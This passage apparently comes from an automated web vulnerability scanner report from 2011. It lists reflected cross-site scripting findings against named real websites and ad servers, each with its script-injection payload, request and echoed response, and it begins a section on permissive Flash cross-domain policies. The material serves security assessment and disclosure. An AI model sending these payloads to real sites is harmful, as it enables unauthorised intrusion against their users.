<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbld066e"><script>alert(1)</script>1d9633a65ee/9873956','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.96. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c955e"><script>alert(1)</script>dfec6a8d34d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9873956c955e"><script>alert(1)</script>dfec6a8d34d HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:52 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9873956c955e"><script>alert(1)</script>dfec6a8d34d','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.97. http://www.und.com/sports/m-footbl/9873956 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99ae9"><script>alert(1)</script>fcb6a136b80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9873956?99ae9"><script>alert(1)</script>fcb6a136b80=1 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:48 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9873956?99ae9"><script>alert(1)</script>fcb6a136b80=1','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.98. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c8b5"><script>alert(1)</script>815941a6815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports9c8b5"><script>alert(1)</script>815941a6815/m-footbl/9874134 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:52 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports9c8b5"><script>alert(1)</script>815941a6815/m-footbl/9874134','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.99. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c09fe"><script>alert(1)</script>185ebd9758c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footblc09fe"><script>alert(1)</script>185ebd9758c/9874134 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:03 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footblc09fe"><script>alert(1)</script>185ebd9758c/9874134','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.100. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c242"><script>alert(1)</script>4a7447b872b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/98741344c242"><script>alert(1)</script>4a7447b872b HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:04 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/98741344c242"><script>alert(1)</script>4a7447b872b','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.101. http://www.und.com/sports/m-footbl/9874134 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 827d3"><script>alert(1)</script>ef15667ce85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9874134?827d3"><script>alert(1)</script>ef15667ce85=1 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:00 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9874134?827d3"><script>alert(1)</script>ef15667ce85=1','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.102. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf530"-alert(1)-"8e103b168e9 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/4462/5032/7102-15.js?cb=0.3047261026222259 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=cf530"-alert(1)-"8e103b168e9; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:11 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:54:11 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 01:54:11 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^49&9346^125a76039212413077175f84d; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111948; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1308

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3188089"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=cf530"-alert(1)-"8e103b168e9\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

5.103. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-2.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cf42"><script>alert(1)</script>c5205d82800 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=1cf42"><script>alert(1)</script>c5205d82800; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=4462/5032; rdk15=0; ses15=5032^2&9346^1; csi15=3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:34 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:55:34 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:55:34 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^42&9346^125a7603945366735abcf916; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111865; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1413

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=1cf42"><script>alert(1)</script>c5205d82800" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

5.104. http://rma-api.gravity.com/v1/beacons/initialize [vaguid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rma-api.gravity.com
Path:   /v1/beacons/initialize

Issue detail

The value of the vaguid cookie is copied into the HTML document as plain text between tags. The payload 5ec60<script>alert(1)</script>be5955fe51a was submitted in the vaguid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /v1/beacons/initialize?u=undefined&sg=6e1ea1b081dc6743bbe3537728eca43d HTTP/1.1
Host: rma-api.gravity.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398395ec60<script>alert(1)</script>be5955fe51a

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0 JSP/2.2 (Oracle GlassFish Server 3.1 Java/Sun Microsystems Inc./1.6)
Server: Oracle GlassFish Server 3.1
P3P: CP="NOI DSP COR ADMa OUR NOR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 111
Date: Sun, 04 Sep 2011 01:01:01 GMT
Connection: close
Set-Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398395ec60<script>alert(1)</script>be5955fe51a; Domain=.gravity.com; Expires=Sat, 05-May-2063 02:02:02 GMT; Path=/

GravityInsights.cc('grvinsights', '172d38ad2d9b9b5aa42030c637b398395ec60<script>alert(1)</script>be5955fe51a');

5.105. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the JSESSIONID cookie is copied into the HTML document as plain text between tags. The payload c7a2a<script>alert(1)</script>9489ac10615 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2c7a2a<script>alert(1)</script>9489ac10615

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2c7a2a<script>alert(1)</script>9489ac10615; Path=/
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:54:12 GMT
Content-Length: 131
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2c7a2a<script>alert(1)</script>9489ac10615"}});

6. Flash cross-domain policy
There are 65 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://ad.afy11.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:56:35 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.2. http://ad.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 00:55:06 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 00:55:05 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.3. http://altfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 00:53:45 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.4. http://api.bit.ly/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bit.ly

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:49:05 GMT
Content-Type: text/xml
Content-Length: 141
Last-Modified: Wed, 25 May 2011 20:29:51 GMT
Connection: close
Expires: Tue, 06 Sep 2011 00:49:05 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://bit.ly/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.5. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 00:49:46 GMT
Date: Sun, 04 Sep 2011 00:49:46 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.6. http://bh.contextweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
